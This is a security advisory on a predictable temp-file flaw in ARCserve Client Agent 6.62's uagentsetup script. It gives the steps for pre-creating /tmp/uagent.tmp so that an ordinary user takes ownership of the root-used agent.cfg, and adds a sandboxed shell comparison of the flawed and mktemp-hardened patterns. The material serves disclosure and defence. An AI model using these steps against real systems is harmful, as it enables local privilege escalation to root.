COMMAND

    ARCserve

SYSTEMS AFFECTED

    Client Agent 6.62

PROBLEM

    'zorgon' found the following.  He discovered a vulnerability in
    Client Agent 6.62 for Unix.  It was tested on a Debian 2.2.14.
    Client Agent has a hole that allows arbitrary code to be executed
    by root without root knowing it.  However, some conditions are
    necessary to exploit this vulnerability.

    Client Agent is used with ARCserveIT, the backup software.  It
    must be installed on all the workstations.  A global configuration
    file, agent.cfg, lists every sub-agent installed on your system.
    This file is in /usr/CYEagent, and receives the information from
    the sub-agent when the script /opt/uagent/uagentsetup is run.

    agent.cfg:

        debian:/usr/CYEagent# more agent.cfg
        #
        #(c) Copyright 1989-1999 Computer Associates International, Inc.
        #and/or its subsidiaries. All Rights Reserved. Use by the United
        #States Government is subject to RESTRICTED RIGHTS as set out in
        #the license agreement.
        #
        
        [0]
        #[UAGENT]
        NAME    Uagent
        VERSION 5.0.0
        HOME    /opt/uagent
        #ENV     CHEY_ENV_DEBUG_LEVEL=4
        ENV     LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
        ENV     SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
        ENV     LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
        BROWSER asbr
        AGENT   uagentd
        MERGE   umrgd
        VERIFY  umrgd

    where asbr, uagentd, and umrgd are programs in /opt/uagent.

    Client Agent is vulnerable only if uagentsetup is run a second
    time.  The first time, it creates the folder /usr/CYEagent and
    the file agent.cfg; on a later run it creates a backup of
    agent.cfg and creates a new agent.cfg without checking
    permissions.  The code in /opt/uagent/uagentsetup:

        # append lines
        #
        case $ANS in
          y|Y|yes|YES|Yes)
                cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
                ${ECHO} >> ${TMPFILE} || exit 2
                mv ${TMPFILE} $dest || exit 2      <------------
                ;;
        esac

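    The file that is moved into place keeps whatever owner and mode
    ${TMPFILE} already had, so anyone who creates that file first can
    control agent.cfg.  The modifications to this file take effect
    when the sub-agent is stopped and restarted.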

    Exploit:

        [zorgon@debian /]$ cd /tmp
        [zorgon@debian /tmp]$ touch uagent.tmp
        [zorgon@debian /tmp]$ chmod 700 uagent.tmp

    If uagentsetup is run a second time:

        [zorgon@debian /]$ ls -lag /usr/CYEagent/
        total 176
        drwxr-xr-x    3 root     root         4096 Jul 19 17:46 .
        drwxr-xr-x   15 root     root         4096 Jul 11 10:37 ..
        -rw-r--r--    1 zorgon   users         618 Jul 19 17:47 agent.cfg
        -rw-r--r--    1 root     root          618 Jul 19 17:47 agent.cfg.old
        -rwxr-xr-x    1 root     root        16899 Jul 11 10:37 asagent
        -rwxr-xr-x    1 root     root       105280 Jul 11 10:37 asagentd
        lrwxrwxrwx    1 root     root           11 Jul 12 10:54 li -> /usr/lib/li
        -rwxr-xr-x    1 root     root        27878 Jul 19 17:47 libarclic98_api.so
        drwxr-xr-x    3 root     root         4096 Jul 11 10:37 nls
        [zorgon@debian /]$
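
    The flawed pattern beside a hardened form, as an added example that
    is not part of the original advisory or of the vendor's script.  It
    assumes, as the steps above imply, that ${TMPFILE} is the fixed path
    /tmp/uagent.tmp; the function names and sandbox layout are
    hypothetical.

```shell
#!/bin/sh
# Added example. All paths live in a throwaway sandbox directory (constructed).

# Pattern from uagentsetup: append to a predictable temp path, then mv it.
# A file already sitting at that path keeps its inode, owner and mode.
vulnerable_install() {      # $1=source cfg  $2=predictable temp path  $3=dest
    cat "$1" >> "$2" || return 2
    mv "$2" "$3" || return 2
}

# Hardened form: mktemp creates a new, unpredictably named file (mode 0600)
# and fails instead of reusing an existing path. The file is created in the
# destination directory (root-owned in the advisory's listing), so the final
# mv is a rename inside that directory.
hardened_install() {        # $1=source cfg  $2=dest
    tmp=$(mktemp "$(dirname "$2")/.agent.cfg.XXXXXX") || return 2
    cat "$1" > "$tmp" || { rm -f "$tmp"; return 2; }
    chmod 644 "$tmp"  || { rm -f "$tmp"; return 2; }
    # Assumption: a root-run installer would also run: chown root "$tmp"
    mv -f "$tmp" "$2" || { rm -f "$tmp"; return 2; }
}

inode_of() { ls -i "$1" | awk '{print $1}'; }

# Succeeds (status 0) when the installed agent.cfg is the pre-created file,
# i.e. when whoever planted it still owns the configuration.
planted_file_survives() {   # $1 = vulnerable | hardened
    box=$(mktemp -d) || return 2
    mkdir "$box/tmp" "$box/CYEagent"
    printf 'NAME    Uagent\n' > "$box/src.cfg"      # constructed sample line
    : > "$box/tmp/uagent.tmp"                        # same steps as the
    chmod 700 "$box/tmp/uagent.tmp"                  # advisory's listing
    planted=$(inode_of "$box/tmp/uagent.tmp")
    if [ "$1" = vulnerable ]; then
        vulnerable_install "$box/src.cfg" "$box/tmp/uagent.tmp" "$box/CYEagent/agent.cfg"
    else
        hardened_install "$box/src.cfg" "$box/CYEagent/agent.cfg"
    fi
    installed=$(inode_of "$box/CYEagent/agent.cfg")
    rm -rf "$box"
    [ "$installed" = "$planted" ]
}
```

    Comparing inode numbers lets the check run without root: with the
    original pattern the installed agent.cfg is the pre-created file
    itself, with the mktemp form it is a fresh file.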

SOLUTION

    Nothing yet.